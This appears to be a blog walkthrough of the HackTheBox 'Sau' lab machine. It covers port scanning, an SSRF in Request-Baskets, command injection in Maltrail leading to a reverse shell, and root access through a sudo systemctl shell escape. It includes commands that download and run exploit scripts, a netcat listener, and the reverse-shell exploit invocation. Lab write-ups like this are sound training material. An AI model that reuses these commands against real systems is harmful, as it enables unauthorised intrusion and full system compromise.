Hi everyone! Welcome to pentestguy. In this post we are going through Sau hackthebox walkthrough. Sau is an linux based ctf(capture the flag) which having easy level difficulties. You can find out Sau machine on hack the box platform using this link.
For Sau machine hackthebox walkthrough we are going to do the enumeration part like post scanning and checking for the services running on the respective port numbers and finding exploit for available version. Getting into the system via exploiting the service, achieving the user and pivoting to the root of the machine.
Nmap Scan
Let’s do the normal port scan using nmap with service version and default script options.
nmap -sV -sC 10.10.X.X -oN nmap.output
# Nmap 7.80 scan initiated Tue Dec 26 23:32:19 2023 as: nmap -sV -sC -oN nmap 10.10.11.224
Nmap scan report for 10.10.11.224
Host is up (0.32s latency).
Not shown: 985 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
80/tcp filtered http
1085/tcp filtered webobjects
1102/tcp filtered adobeserver-1
1124/tcp filtered hpvmmcontrol
1461/tcp filtered ibm_wrless_lan
3006/tcp filtered deslogind
3766/tcp filtered sitewatch-s
5080/tcp filtered onscreen
7100/tcp filtered font-service
32783/tcp filtered unknown
41511/tcp filtered unknown
49175/tcp filtered unknown
50500/tcp filtered unknown
55555/tcp open unknown
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| X-Content-Type-Options: nosniff
| Date: Tue, 26 Dec 2023 18:03:47 GMT
| Content-Length: 75
| invalid basket name; the name does not match pattern: ^[wd-_\.]{1,250}$
| GenericLines, Help, Kerberos, LDAPSearchReq, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 302 Found
| Content-Type: text/html; charset=utf-8
| Location: /web
| Date: Tue, 26 Dec 2023 18:03:13 GMT
| Content-Length: 27
| href="/web">Found</a>.
| HTTPOptions:
| HTTP/1.0 200 OK
| Allow: GET, OPTIONS
| Date: Tue, 26 Dec 2023 18:03:15 GMT
|_ Content-Length: 0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port55555-TCP:V=7.80%I=7%D=12/26%Time=658B1561%P=x86_64-pc-linux-gnu%r(
SF:GetRequest,A2,"HTTP/1\.0\x20302\x20Found\r\nContent-Type:\x20text/html;
SF:\x20charset=utf-8\r\nLocation:\x20/web\r\nDate:\x20Tue,\x2026\x20Dec\x2
SF:02023\x2018:03:13\x20GMT\r\nContent-Length:\x2027\r\n\r\n<a\x20href=\"/
SF:web\">Found</a>\.\n\n")%r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20R
SF:equest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\
SF:x20close\r\n\r\n400\x20Bad\x20Request")%r(HTTPOptions,60,"HTTP/1\.0\x20
SF:200\x20OK\r\nAllow:\x20GET,\x20OPTIONS\r\nDate:\x20Tue,\x2026\x20Dec\x2
SF:02023\x2018:03:15\x20GMT\r\nContent-Length:\x200\r\n\r\n")%r(RTSPReques
SF:t,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain
SF:;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request
SF:")%r(Help,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20te
SF:xt/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x2
SF:0Request")%r(SSLSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nCo
SF:ntent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n
SF:\r\n400\x20Bad\x20Request")%r(TerminalServerCookie,67,"HTTP/1\.1\x20400
SF:\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n
SF:Connection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(TLSSessionReq,67,
SF:"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20
SF:charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(
SF:Kerberos,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20tex
SF:t/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20
SF:Request")%r(FourOhFourRequest,EA,"HTTP/1\.0\x20400\x20Bad\x20Request\r\
SF:nContent-Type:\x20text/plain;\x20charset=utf-8\r\nX-Content-Type-Option
SF:s:\x20nosniff\r\nDate:\x20Tue,\x2026\x20Dec\x202023\x2018:03:47\x20GMT\
SF:r\nContent-Length:\x2075\r\n\r\ninvalid\x20basket\x20name;\x20the\x20na
SF:me\x20does\x20not\x20match\x20pattern:\x20\^\[\\w\\d\\-_\\\.\]{1,250}\$
SF:\n")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type
SF::\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x2
SF:0Bad\x20Request")%r(LDAPSearchReq,67,"HTTP/1\.1\x20400\x20Bad\x20Reques
SF:t\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20cl
SF:ose\r\n\r\n400\x20Bad\x20Request");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Dec 26 23:35:02 2023 -- 1 IP address (1 host up) scanned in 162.94 seconds
In the above scan we found that port number 80 is there but filtered, tried with port number 55555 and there is web service running on it.
Exploitation
After analyzing we found that Request-Baskets is there on that port number with 1.2.1 version, just search for the public exploit available for the respected version and we found one.
If you want direct shell into the system you can give a try to automatic exploit for Request Baskets and Mailtrail using this script – https://github.com/HusenjanDev/CVE-2023-27163-AND-Mailtrail-v0.53
Which is a SSRF vulnerablility, here we are going to see two different ways to exploit it, one is manual and another one is using automated script.
Manual Way
Create a new basket first
Open the settings/configuration given from the right hand side bar and add the following setting to perform server side request forgery. We can remember from the port scan that port number 80 was filtered that means something is running on it.
To perform SSRF attack we need to open the newly created basket url and here we are able to see another service running named Mailtrail with version 0.53.
Automated Way
For the same SSRF we can use the shell script available on github – https://github.com/entr0pie/CVE-2023-27163
To exploit that download the shell file and run it
wget https://raw.githubusercontent.com/entr0pie/CVE-2023-27163/main/CVE-2023-27163.sh ./CVE-2023-27163.sh htto://10.10.X.X:55555 http://127.0.0.1:80
Again after searching we found that there is a command os injection available for respected mailtrail version. Download the exploit from github https://github.com/spookier/Maltrail-v0.53-Exploit
Make sure to run netcat to get the shell, to do that use the following command
nc -lvp 8888
To exploit it run the following command
python3 exploit.py 10.10.14.129 8888 http://10.10.X.X/x8sspx1
User flag
After getting into the system simply go to the home directory and we can found the user flag.
Root user
To get root user, try simple privilege escalation technique.
sudo -l sudo /usr/bin/systemctl status trail.service !/bin/sh
If you found this post helpful then please share it with your co-workers and friends. Please provide your valuable comment and let us know if there is any suggestion. Now you can also collab with us please check our collaboration page, thank you!
